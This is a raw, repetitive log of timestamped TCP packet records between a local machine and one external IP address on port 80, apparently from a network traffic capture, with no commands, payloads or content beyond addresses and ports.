Oct 3, 2024 18:38:21.342067957 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342097044 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.342099905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342113972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.342139959 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342148066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.342174053 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342190981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.342206955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342258930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.342540979 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342575073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342607021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342624903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.342662096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.342720032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342756987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342787027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342808008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.342840910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.342854023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342895031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342922926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.342955112 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.342987061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.395134926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.395201921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.395281076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.395315886 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.395350933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.395370960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.395469904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.395531893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.395540953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.395575047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.395592928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.395622969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.395832062 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.395864010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.395884037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.395898104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.395911932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.395945072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.395982027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.396013975 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.396048069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.396065950 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.396083117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.396117926 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.396152973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.396728039 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.396760941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.396781921 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.396795034 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.396811962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.396845102 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.396888971 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.396927118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.396946907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.396960974 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.396979094 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.396995068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.397012949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.397027969 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.397043943 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.397077084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.397248983 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.397281885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.397315025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.397332907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.397346973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.397367954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.397381067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.397413969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.397417068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.397432089 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.397502899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.430632114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.430697918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.430870056 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.430905104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.430939913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.430953979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.430958033 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.430991888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431004047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431039095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431046009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431083918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431092978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431118965 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431128979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431154013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431164026 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431196928 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431262016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431294918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431325912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431328058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431364059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431396008 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431483030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431518078 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431531906 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431550980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431576014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431585073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431598902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431619883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431638002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431653976 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431664944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431689024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431713104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431723118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.431739092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.431778908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433141947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433175087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433201075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433207989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433227062 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433243036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433258057 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433291912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433294058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433329105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433345079 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433362961 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433377028 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433413982 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433430910 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433470011 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433482885 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433507919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433528900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433542013 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433557987 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433571100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433590889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433603048 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433623075 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433636904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433650970 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433665037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433686018 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433713913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433716059 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433753014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433765888 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433785915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433810949 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433820009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433850050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433854103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433885098 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433888912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433911085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433924913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433938980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433958054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.433983088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.433990002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434020042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434025049 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434039116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434053898 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434087038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434108019 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434118032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434143066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434151888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434178114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434185028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434200048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434220076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434252977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434276104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434286118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434312105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434324980 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434349060 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434357882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434372902 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434393883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434412956 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434426069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434447050 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434473991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434492111 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434528112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434542894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434576035 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434766054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434798002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434830904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434834957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434847116 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434864998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434880972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434901953 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434911966 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434935093 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434957981 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.434967995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.434983015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.435024977 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.435832977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.435866117 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.435900927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.435918093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.435918093 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.435955048 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436006069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436039925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436055899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436074018 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436093092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436105967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436139107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436171055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436171055 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436189890 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436192989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436224937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436259985 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436275959 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436291933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436311007 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436358929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436667919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436702967 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436719894 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436736107 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436750889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436770916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436785936 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436805010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436817884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436840057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436852932 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436873913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436885118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.436909914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.436928034 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.437002897 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.437251091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.437298059 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.437302113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.437335968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.437355042 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.437369108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.437402964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.437422037 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.437436104 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.437458038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.437472105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.437486887 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.437500954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.437531948 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.437552929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.492593050 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.492610931 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.492625952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.492698908 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.493444920 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.493459940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.493474960 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.493490934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.493505001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.493518114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.493556976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.493556976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.493582010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.493597031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.493611097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.493627071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.493649006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.493679047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.494518995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.494534016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.494549036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.494563103 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.494577885 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.494587898 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.494602919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.494615078 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.494618893 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.494635105 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.494637012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.494652987 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.494657993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.494680882 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.494703054 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.525453091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.525633097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.525665045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.525698900 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.525697947 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.525719881 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.525732994 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.525751114 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.525765896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.525799036 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.525815010 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.525846958 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.525993109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526025057 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526047945 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526057005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526071072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526091099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526104927 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526124954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526139975 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526170015 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526174068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526206017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526221991 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526240110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526256084 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526276112 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526288986 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526325941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526717901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526751995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526801109 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526879072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526913881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526946068 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 3, 2024 18:38:21.526948929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526978016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 3, 2024 18:38:21.526981115 CEST	80	49730	185.215.113.37	192.168.2.4
